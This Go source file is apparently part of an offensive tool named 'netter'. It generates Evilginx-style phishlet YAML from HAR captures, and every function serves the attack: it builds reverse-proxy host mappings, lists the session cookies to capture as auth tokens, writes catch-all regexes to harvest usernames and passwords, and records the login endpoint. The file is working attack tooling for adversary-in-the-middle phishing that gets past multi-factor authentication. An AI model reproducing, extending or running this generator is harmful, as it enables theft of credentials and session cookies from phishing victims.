package core

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// PhishletBuilder builds phishlet YAML from HAR analysis
type PhishletBuilder struct {
	analysis          *HARAnalysis
	selectedCookies   []*CookieInfo
	credentials       *PostRequestInfo
	loginInfo         *PostRequestInfo
	generatedPhishlet string
}

func NewPhishletBuilder(analysis *HARAnalysis, selectedCookies []*CookieInfo, credentials *PostRequestInfo, loginInfo *PostRequestInfo) *PhishletBuilder {
	return &PhishletBuilder{
		analysis:        analysis,
		selectedCookies: selectedCookies,
		credentials:     credentials,
		loginInfo:       loginInfo,
	}
}

// Build generates the phishlet YAML
func (pb *PhishletBuilder) Build() (string, error) {
	var sb strings.Builder

	// Header comment
	sb.WriteString("# Generated by netter from HAR file\n")
	sb.WriteString(fmt.Sprintf("# Date: %s\n", time.Now().Format("2006-01-02")))
	sb.WriteString(fmt.Sprintf("# Domains analyzed: %d\n", len(pb.analysis.Domains)))
	sb.WriteString(fmt.Sprintf("# Cookies captured: %d\n", len(pb.selectedCookies)))
	sb.WriteString("#\n")
	sb.WriteString("# IMPORTANT: Review and test this phishlet before use\n")
	sb.WriteString("# You may need to add:\n")
	sb.WriteString("# - sub_filters for custom URL rewriting\n")
	sb.WriteString("# - auth_urls for dynamic session detection\n")
	sb.WriteString("# - force_post for remember-me functionality\n")
	sb.WriteString("\n")

	// Min version
	sb.WriteString("min_ver: '3.0.0'\n")

	// Proxy hosts
	if err := pb.buildProxyHosts(&sb); err != nil {
		return "", err
	}

	// Auth tokens
	if err := pb.buildAuthTokens(&sb); err != nil {
		return "", err
	}

	// Credentials
	if err := pb.buildCredentials(&sb); err != nil {
		return "", err
	}

	// Login
	if err := pb.buildLogin(&sb); err != nil {
		return "", err
	}

	pb.generatedPhishlet = sb.String()
	return pb.generatedPhishlet, nil
}

func (pb *PhishletBuilder) buildProxyHosts(sb *strings.Builder) error {
	sb.WriteString("proxy_hosts:\n")

	// Sort domains for consistent output (landing first, then alphabetically)
	var domains []*DomainInfo
	for _, d := range pb.analysis.Domains {
		domains = append(domains, d)
	}

	sort.Slice(domains, func(i, j int) bool {
		if domains[i].IsLanding != domains[j].IsLanding {
			return domains[i].IsLanding
		}
		return domains[i].OrigDomain < domains[j].OrigDomain
	})

	for _, domain := range domains {
		sb.WriteString(fmt.Sprintf("  - {phish_sub: '%s', orig_sub: '%s', domain: '%s', session: %v, is_landing: %v, auto_filter: true}\n",
			domain.OrigSubdomain,
			domain.OrigSubdomain,
			domain.BaseDomain,
			domain.HasSession,
			domain.IsLanding,
		))
	}

	return nil
}

func (pb *PhishletBuilder) buildAuthTokens(sb *strings.Builder) error {
	sb.WriteString("auth_tokens:\n")

	// Group cookies by domain
	cookiesByDomain := make(map[string][]string)
	for _, cookie := range pb.selectedCookies {
		cookiesByDomain[cookie.Domain] = append(cookiesByDomain[cookie.Domain], cookie.Name)
	}

	// Sort domains for consistent output
	var domains []string
	for domain := range cookiesByDomain {
		domains = append(domains, domain)
	}
	sort.Strings(domains)

	for _, domain := range domains {
		keys := cookiesByDomain[domain]
		sort.Strings(keys)

		// Build keys array
		keysStr := "["
		for i, key := range keys {
			if i > 0 {
				keysStr += ", "
			}
			keysStr += fmt.Sprintf("'%s'", key)
		}
		keysStr += "]"

		sb.WriteString(fmt.Sprintf("  - domain: '%s'\n", domain))
		sb.WriteString(fmt.Sprintf("    keys: %s\n", keysStr))
	}

	return nil
}

func (pb *PhishletBuilder) buildCredentials(sb *strings.Builder) error {
	sb.WriteString("credentials:\n")

	// Username
	sb.WriteString("  username:\n")
	sb.WriteString(fmt.Sprintf("    key: '%s'\n", pb.credentials.UsernameKey))
	sb.WriteString("    search: '(.*)'\n")
	sb.WriteString(fmt.Sprintf("    type: '%s'\n", pb.credentials.PostType))

	// Password
	sb.WriteString("  password:\n")
	sb.WriteString(fmt.Sprintf("    key: '%s'\n", pb.credentials.PasswordKey))
	sb.WriteString("    search: '(.*)'\n")
	sb.WriteString(fmt.Sprintf("    type: '%s'\n", pb.credentials.PostType))

	return nil
}

func (pb *PhishletBuilder) buildLogin(sb *strings.Builder) error {
	sb.WriteString("login:\n")
	sb.WriteString(fmt.Sprintf("  domain: '%s'\n", pb.loginInfo.Domain))
	sb.WriteString(fmt.Sprintf("  path: '%s'\n", pb.loginInfo.Path))

	return nil
}
